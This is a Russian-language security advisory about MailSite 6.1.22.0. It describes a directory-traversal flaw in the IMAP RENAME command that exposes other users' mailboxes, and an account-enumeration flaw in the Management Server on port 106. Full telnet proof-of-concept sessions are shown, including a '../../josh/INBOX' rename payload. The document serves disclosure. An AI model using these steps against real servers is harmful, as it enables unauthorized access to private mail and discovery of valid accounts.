Программа: MailSite 6.1.22.0, возможно более ранние версии
Уязвимость позволяет удаленному пользователю получить доступ к потенциально важным данным на системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах команды RENAME. Удаленный пользователь может с помощью символов обхода каталога просмотреть письма других пользователей на системе.
Пример:
josh at lab1:~$ telnet 10.0.0.5 143
Trying 10.0.0.5...
Connected to 10.0.0.5.
Escape character is '^]'.
* OK MailSite IMAP4 Server 6.1.22.0 ready
a1 login joe pass
a1 OK LOGIN completed
a2 rename ../../josh/INBOX gotcha
a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
a3 select gotcha
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* 0 EXISTS
* 0 RECENT
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
* OK [UNSEEN 0]
* OK [UIDVALIDITY 514563061] UIDs are valid
a3 OK [READ-WRITE] opened gotcha
Удаленный пользователь может определить наличие учетной записи на системе с помощью Management Server (106/tcp).
Пример:
josh at maoz:~$ telnet 10.0.0.6 106
Trying 10.0.0.6...
Connected to 10.0.0.6 (10.0.0.6).
Escape character is '^]'.
200 Ok, "MailSite Mail Management Server (7.0.3.1) ready"
user IDoNotExist
510 "Error 2 in OpenMailbox, The system cannot find the file specified. "
user postmaster
200 Ok, "send password"
